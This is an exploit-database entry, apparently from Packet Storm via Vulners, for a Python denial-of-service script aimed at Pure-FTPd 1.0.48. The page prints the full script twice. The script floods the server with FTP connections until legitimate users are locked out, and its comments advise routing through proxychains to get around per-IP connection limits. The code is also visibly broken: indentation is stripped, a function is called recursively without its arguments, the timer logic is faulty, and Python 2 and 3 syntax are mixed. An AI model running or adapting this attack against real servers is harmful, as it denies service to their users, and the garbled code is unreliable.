Search...

Pure-FTPd 1.0.48 Remote Denial Of Service

2020-11-26T00:00:00

ID PACKETSTORM:160224
Type packetstorm
Reporter xynmaps
Modified 2020-11-26T00:00:00

Description

                                        
                                            `# Exploit Title: Pure-FTPd 1.0.48 - Remote Denial of Service  
# Date: 2020. nov. 26., 09:32:17 CET  
# Exploit Author: xynmaps  
# Vendor Homepage: https://www.pureftpd.org/project/pure-ftpd/  
# Software Link: https://github.com/jedisct1/pure-ftpd/  
# Version: 1.0.48  
# Tested on: Parrot Security OS 5.9.0  
  
#encoding=utf8  
#__author__ = XYN/Dump/NSKB3  
#Pure-FTPd Denial of Service exploit by XYN/Dump/NSKB3.  
"""  
Pure-FTPd only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,  
you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.  
(if it's limited, just run this script from different proxies using proxychains, and it will work)  
"""  
  
import socket  
import sys  
import threading  
import subprocess  
import time  
  
banner = """  
._________________.  
| Pure-FTPd |  
| D o S |  
|_________________|  
|By XYN/DUMP/NSKB3|  
|_|_____________|_|  
|_|_|_|_____|_|_|_|  
|_|_|_|_|_|_|_|_|_|  
  
"""  
usage = "{} &lt;TARGET&gt; &lt;PORT(DEFAULT:21&gt; &lt;MAX_CONNS(DEFAULT:50)&gt;".format(sys.argv[0])  
  
def test(t,p):  
s = socket.socket()  
s.settimeout(10)  
try:  
s.connect((t, p))  
response = s.recv(65535)  
s.close()  
return 0  
except socket.error:  
print("Port {} is not open, please specify a port that is open.".format(p))  
sys.exit()  
def attack(targ, po, id):  
try:  
subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)  
#print("Worker {} running".format(id))  
except OSError: pass  
def main():  
global target, port, start  
print banner  
try:  
target = sys.argv[1]  
except:  
print usage  
sys.exit()  
try:  
port = int(sys.argv[2])  
except:  
port = 21  
try:  
conns = int(sys.argv[3])  
except:  
conns = 50  
print("[!] Testing if {0}:{1} is open".format(target, port))  
test(target, port)  
print("[+] Port {} open, starting attack...".format(port))  
time.sleep(2)  
print("[+] Attack started on {0}:{1}!".format(target, port))  
def loop(target, port, conns):  
global start  
threading.Thread(target=timer).start()  
while 1:  
for i in range(1, conns + 3):  
t = threading.Thread(target=attack, args=(target,port,i,))  
t.start()  
if i &gt; conns + 2:  
t.join()  
break  
loop()  
  
t = threading.Thread(target=loop, args=(target, port, conns,))  
t.start()  
  
def timer():  
start = time.time()  
while 1:  
if start &lt; time.time() + float(900): pass  
else:  
subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)  
t = threading.Thread(target=loop, args=(target, port,))  
t.start()  
break  
  
main()  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:160224", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Pure-FTPd 1.0.48 Remote Denial Of Service", "description": "", "published": "2020-11-26T00:00:00", "modified": "2020-11-26T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/160224/Pure-FTPd-1.0.48-Remote-Denial-Of-Service.html", "reporter": "xynmaps", "references": [], "cvelist": [], "lastseen": "2020-11-28T17:50:23", "viewCount": 193, "enchantments": {"dependencies": {"references": [], "modified": "2020-11-28T17:50:23", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2020-11-28T17:50:23", "rev": 2}, "vulnersScore": -0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/160224/pureftpd1048-dos.txt", "sourceData": "`# Exploit Title: Pure-FTPd 1.0.48 - Remote Denial of Service \n# Date: 2020. nov. 26., 09:32:17 CET \n# Exploit Author: xynmaps \n# Vendor Homepage: https://www.pureftpd.org/project/pure-ftpd/ \n# Software Link: https://github.com/jedisct1/pure-ftpd/ \n# Version: 1.0.48 \n# Tested on: Parrot Security OS 5.9.0 \n \n#encoding=utf8 \n#__author__ = XYN/Dump/NSKB3 \n#Pure-FTPd Denial of Service exploit by XYN/Dump/NSKB3. \n\"\"\" \nPure-FTPd only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server, \nyou can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited. \n(if it's limited, just run this script from different proxies using proxychains, and it will work) \n\"\"\" \n \nimport socket \nimport sys \nimport threading \nimport subprocess \nimport time \n \nbanner = \"\"\" \n._________________. \n| Pure-FTPd | \n| D o S | \n|_________________| \n|By XYN/DUMP/NSKB3| \n|_|_____________|_| \n|_|_|_|_____|_|_|_| \n|_|_|_|_|_|_|_|_|_| \n \n\"\"\" \nusage = \"{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>\".format(sys.argv[0]) \n \ndef test(t,p): \ns = socket.socket() \ns.settimeout(10) \ntry: \ns.connect((t, p)) \nresponse = s.recv(65535) \ns.close() \nreturn 0 \nexcept socket.error: \nprint(\"Port {} is not open, please specify a port that is open.\".format(p)) \nsys.exit() \ndef attack(targ, po, id): \ntry: \nsubprocess.Popen(\"ftp {0} {1}\".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) \n#print(\"Worker {} running\".format(id)) \nexcept OSError: pass \ndef main(): \nglobal target, port, start \nprint banner \ntry: \ntarget = sys.argv[1] \nexcept: \nprint usage \nsys.exit() \ntry: \nport = int(sys.argv[2]) \nexcept: \nport = 21 \ntry: \nconns = int(sys.argv[3]) \nexcept: \nconns = 50 \nprint(\"[!] Testing if {0}:{1} is open\".format(target, port)) \ntest(target, port) \nprint(\"[+] Port {} open, starting attack...\".format(port)) \ntime.sleep(2) \nprint(\"[+] Attack started on {0}:{1}!\".format(target, port)) \ndef loop(target, port, conns): \nglobal start \nthreading.Thread(target=timer).start() \nwhile 1: \nfor i in range(1, conns + 3): \nt = threading.Thread(target=attack, args=(target,port,i,)) \nt.start() \nif i > conns + 2: \nt.join() \nbreak \nloop() \n \nt = threading.Thread(target=loop, args=(target, port, conns,)) \nt.start() \n \ndef timer(): \nstart = time.time() \nwhile 1: \nif start < time.time() + float(900): pass \nelse: \nsubprocess.Popen(\"pkill ftp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) \nt = threading.Thread(target=loop, args=(target, port,)) \nt.start() \nbreak \n \nmain() \n`\n"}